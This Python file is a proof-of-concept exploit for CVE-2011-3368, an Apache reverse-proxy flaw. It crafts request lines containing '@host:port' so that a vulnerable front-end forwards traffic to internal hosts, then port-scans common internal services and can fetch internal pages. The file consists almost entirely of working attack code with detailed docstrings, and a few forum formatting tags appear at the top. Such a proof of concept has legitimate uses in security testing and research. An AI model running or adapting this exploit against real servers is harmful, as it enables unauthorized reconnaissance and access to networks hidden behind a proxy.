[COLOR=#008200]#!/usr/bin/env python [/COLOR]
[B][COLOR=#006699]import[/COLOR][/B] socket
[B][COLOR=#006699]import[/COLOR][/B] string
[B][COLOR=#006699]import[/COLOR][/B] getopt, sys
# Ports probed on the internal host when no -e option narrows the scan to one.
# Port 0 is kept from the original list; it is not a usable TCP destination,
# so presumably it serves as a baseline "closed" reply to compare the others
# against -- confirm before relying on it.
known_ports = [
    0,
    21, 22, 23, 25,        # ftp, ssh, telnet, smtp
    53, 69, 80,            # dns, tftp, http
    110, 137, 139,         # pop3, netbios
    443, 445,              # https, smb
    3306, 3389,            # mysql, rdp
    5432, 5900, 8080,      # postgres, vnc, http-alt
]
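def send_request(url, apache_target, apache_port, internal_target, internal_port, resource, timeout=3):
    """Send one crafted GET through the front-end Apache and return the raw reply.

    The request line embeds ``internal_target:internal_port`` after an ``@``
    so that a reverse proxy affected by CVE-2011-3368 forwards the request
    to the internal host instead of its configured backend.  The request
    bytes are the probe itself and are kept exactly as in the original PoC.

    Args:
        url: Path on the front-end server that the proxy rule applies to.
        apache_target: Hostname or IP of the front-end Apache.
        apache_port: Front-end port, as a decimal string.
        internal_target: Host behind the proxy to reach.
        internal_port: Port on the internal host, as a decimal string.
        resource: Path requested from the internal host.
        timeout: Socket timeout in seconds for connect/send/recv
            (the original hard-coded 3).

    Returns:
        The first chunk (up to 4096 bytes) of the reply, or "" when the
        connection fails, *apache_port* is not numeric, or nothing arrives
        before *timeout*.  scan_host() reports "" as "Filtered", so a
        front-end that is simply unreachable is indistinguishable, from
        here, from an internal port that drops the connection.
    """
    request = ("GET " + url + "@" + internal_target + ":" + internal_port
               + "/" + resource + " HTTP/1.1\r\n"
               + "Host: " + apache_target + "\r\n\r\n")
    # On Python 2 str already is bytes; on 3 the socket needs an encoding.
    if not isinstance(request, bytes):
        request = request.encode("latin-1")
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.settimeout(timeout)
    try:
        sock.connect((apache_target, int(apache_port)))
        # sendall, not send: send() may write only part of the request.
        sock.sendall(request)
        # A single recv mirrors the original PoC; replies longer than 4096
        # bytes are truncated, which matters in the "-g" retrieve mode.
        return sock.recv(4096)
    except (socket.error, ValueError):
        # socket.timeout is a socket.error subclass; ValueError covers a
        # non-numeric apache_port.  The original bare ``except`` also
        # swallowed KeyboardInterrupt, so Ctrl-C could not stop a scan.
        return ""
    finally:
        # The original never closed the socket, leaking one per probed port.
        sock.close()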
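def get_banner(result):
    """Return the body of a raw HTTP reply (everything after the first blank line).

    Args:
        result: Raw reply text as returned by send_request().

    Returns:
        The text after the first ``\\r\\n\\r\\n``, or "" when *result* has
        no header terminator (reply truncated inside the headers, or not
        HTTP at all).  The original returned ``result[3:]`` in that case,
        because ``find`` yielded -1, and so printed nearly the whole reply
        as if it were a banner.
    """
    separator = "\r\n\r\n"
    position = result.find(separator)
    if position == -1:
        return ""
    return result[position + len(separator):]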
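def _status_code(reply):
    """Return the status code from the status line of a raw HTTP reply.

    Only the first line is consulted, so a body that merely quotes
    "HTTP/1.1 200" (an error page, say) no longer counts as a match, and a
    reply whose status line says "HTTP/1.0 ..." is no longer ignored.
    Returns "" when the first line is not an HTTP status line.
    """
    status_line = reply.split("\r\n", 1)[0]
    fields = status_line.split(None, 2)
    if len(fields) < 2 or not fields[0].startswith("HTTP/"):
        return ""
    return fields[1]


def scan_host(url, apache_target, apache_port, internal_target, tested_ports, resource):
    """Probe each port in *tested_ports* on *internal_target* through the proxy.

    Prints the banner, then one line per port, classified as:

    - Open: status code 200, 30x or 502 -- the original's heuristic for
      "the proxy got as far as the internal port"; the reply body (as
      returned by get_banner) is printed underneath.
    - Filtered: send_request() returned "".  That also happens when the
      front-end itself is unreachable or -p is wrong, so a run in which
      every port is "Filtered" means "no result", not "everything filtered".
    - Closed: any other reply (typically a 4xx/5xx from the front-end).

    A front-end that answers 200/30x to arbitrary paths makes every port
    look open; compare against a port known to be closed before trusting
    the list.

    Args:
        url: Path on the front-end that the proxy rule matches.
        apache_target: Front-end host.
        apache_port: Front-end port, as a decimal string.
        internal_target: Host behind the proxy.
        tested_ports: Iterable of ports (int or str); each is probed once.
        resource: Path requested from the internal host.
    """
    print_banner(url, apache_target, apache_port, internal_target, tested_ports, resource)
    for port in tested_ports:
        port = str(port)
        result = send_request(url, apache_target, apache_port, internal_target, port, resource)
        code = _status_code(result)
        if code == "200" or code.startswith("30") or code == "502":
            print("- Open port: " + port + "/TCP")
            print(get_banner(result))
        elif not result:
            print("- Filtered port: " + port + "/TCP")
        else:
            print("- Closed port: " + port + "/TCP")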
def usage():
    """Print the help text (program banner, option list and examples) to stdout."""
    help_lines = [
        "",
        "CVE-2011-3368 proof of concept by Rodrigo Marcos",
        "http://www.secforce.co.uk",
        "",
        "usage():",
        "python apache_scan.py [options]",
        "",
        " [options]",
        " -r: Remote Apache host",
        " -p: Remote Apache port (default is 80)",
        " -u: URL on the remote web server (default is /)",
        " -d: Host in the DMZ (default is 127.0.0.1)",
        " -e: Port in the DMZ (enables 'single port scan')",
        " -g: GET request to the host in the DMZ (default is /)",
        " -h: Help page",
        "",
        "examples:",
        " - Port scan of the remote host",
        " python apache_scan.py -r www.example.com -u /images/test.gif",
        " - Port scan of a host in the DMZ",
        " python apache_scan.py -r www.example.com -u /images/test.gif -d internalhost.local",
        " - Retrieve a resource from a host in the DMZ",
        " python apache_scan.py -r www.example.com -u /images/test.gif -d internalhost.local -e 80 -g /accounts/index.html",
        "",
    ]
    # One print of the joined text emits exactly the same bytes as one
    # print per line (the trailing "" yields the closing blank line).
    print("\n".join(help_lines))
def print_banner(url, apache_target, apache_port, internal_target, tested_ports, resource):
    """Print the run header: tool banner plus the target settings in use.

    Args:
        url: Accepted for interface compatibility; not printed.
        apache_target: Front-end host, printed as-is.
        apache_port: Front-end port string, printed as-is.
        internal_target: Internal host, printed as-is.
        tested_ports: Port list; printed via str(), so a list shows as
            "[21, 22]".
        resource: Internal path, printed as-is.
    """
    header = [
        "",
        "CVE-2011-3368 proof of concept by Rodrigo Marcos",
        "http://www.secforce.co.uk",
        "",
        " [+] Target: " + apache_target,
        " [+] Target port: " + apache_port,
        " [+] Internal host: " + internal_target,
        " [+] Tested ports: " + str(tested_ports),
        " [+] Internal resource: " + resource,
        "",
    ]
    print("\n".join(header))
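def _is_port(value):
    """True when *value* is a decimal string within the TCP port range 0-65535."""
    return value.isdigit() and int(value) <= 65535


def main():
    """Parse the command line into the module-level settings.

    Reads sys.argv and assigns url, apache_target, apache_port,
    internal_target, internal_port and resource -- module globals the
    caller must have initialised with their defaults beforehand (only
    options that are present overwrite them).

    Prints usage and exits with status 2 on an unknown option, on
    -h/--help, when -r is missing, or when -p/-e are not port numbers.
    The port check is new: a non-numeric port used to surface only as
    int() failing inside send_request's catch-all, i.e. every port was
    silently reported as "Filtered".
    """
    global apache_target
    global apache_port
    global url
    global internal_target
    global internal_port
    global resource
    try:
        opts, _args = getopt.getopt(sys.argv[1:], "u:r:p:d:e:g:h", ["help"])
    except getopt.GetoptError:
        usage()
        sys.exit(2)
    # The original wrapped this loop in a second ``except GetoptError``;
    # getopt raises only while parsing above, so that handler was dead.
    for option, value in opts:
        if option in ("-h", "--help"):
            usage()
            sys.exit(2)
        elif option == "-u":
            url = value
        elif option == "-r":
            apache_target = value
        elif option == "-p":
            apache_port = value
        elif option == "-d":
            internal_target = value
        elif option == "-e":
            internal_port = value
        elif option == "-g":
            resource = value
    if apache_target == "":
        usage()
        sys.exit(2)
    # internal_port == "" means "not given" and selects the known_ports sweep.
    for port_value in (apache_port, internal_port):
        if port_value != "" and not _is_port(port_value):
            print("Invalid port: " + port_value)
            usage()
            sys.exit(2)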
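if __name__ == "__main__":
    # Defaults; main() overwrites them from the command line through
    # ``global``.  Guarded so that importing the module (e.g. to reuse
    # send_request) no longer parses sys.argv and starts a scan.
    url = "/"
    apache_target = ""
    apache_port = "80"
    internal_target = "127.0.0.1"
    internal_port = ""
    resource = "/"
    main()
    # -e narrows the scan to one port; otherwise sweep known_ports.
    if internal_port != "":
        tested_ports = [internal_port]
    else:
        tested_ports = known_ports
    scan_host(url, apache_target, apache_port, internal_target, tested_ports, resource)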
